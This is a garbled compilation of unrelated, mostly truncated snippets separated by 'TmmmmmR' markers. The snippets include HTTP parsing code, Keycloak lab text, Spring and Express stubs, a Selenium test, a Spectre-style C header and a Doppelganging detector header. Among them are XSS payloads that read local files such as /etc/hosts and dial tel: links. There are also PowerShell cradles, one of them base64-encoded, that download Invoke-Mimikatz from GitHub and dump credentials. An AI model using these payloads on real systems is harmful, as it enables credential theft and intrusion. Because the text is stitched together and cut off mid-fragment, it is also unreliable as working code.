TmmmmmR

def extract_http_request(message: dict) -> HttpRequest:
    request_header = message.get('requestHeader', '')
    request_body = message.get('requestBody', '')

    # Split header into lines and parse the request line
    lines = request_header.split('\r\n')
    request_line = lines[0] if lines else ''
    parts = request_line.split(' ')
    if len(parts) < 3:
        raise ValueError("Invalid HTTP request line")

TmmmmmR

Lab 1 : OIDC

This lab demonstrates how OpenID Connect works step by step and the available settings within Keycloak.

• Use the simulator to forge an authentication URL and see how redirection works.
• Observe each step of the flow and the data exchanged with Keycloak.
• Learn how to define custom attributes and control access to them using scopes.

👉 Lab URL with self-check: https://labs.keycloak.academy/lab/{{yourRealm}}/oidc-playground

TmmmmmR

package com.example.demo;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.*;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

@Controller

TmmmmmR

const express = require('express');
const session = require('express-session');
const cors = require('cors');
const jwt = require('jsonwebtoken');

const app = express();
app.use(cors());

// Memory store for sessions
const memoryStore = new session.MemoryStore();

TmmmmmR

{
  "realm": "myrealm",
  "enabled": true,
  "requiredCredentials": [
    "password"
  ],
  "users": [
    {
      "username": "alice",
      "enabled": true,

TmmmmmR

<script>document.location='tel://1123456789'<script>

<script> a = new XMLHttpRequest(); a.open('GET','file:///private/var/wireless/Library/Databases/DataUsage.sqlite', true); a.send();alert(a.responseText);</script>

<script> a = new XMLHttpRequest(); a.open('GET','file:///etc/hosts', false); a.send();alert(a.responseText);</script>

<iframe src="tel://1123456789"></iframe>

TmmmmmR

"""
A simple selenium test example written by python
"""

import unittest
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException

class TestTemplate(unittest.TestCase):
    """Include test cases on a given url"""

TmmmmmR

*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==

#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master

TmmmmmR

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

TmmmmmR

function Get-Doppelgangers
{
    <# 
    .SYNOPSIS 
    
    Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
     
    Author: Joe Desimone (@dez_) 
    License: BSD 3-Clause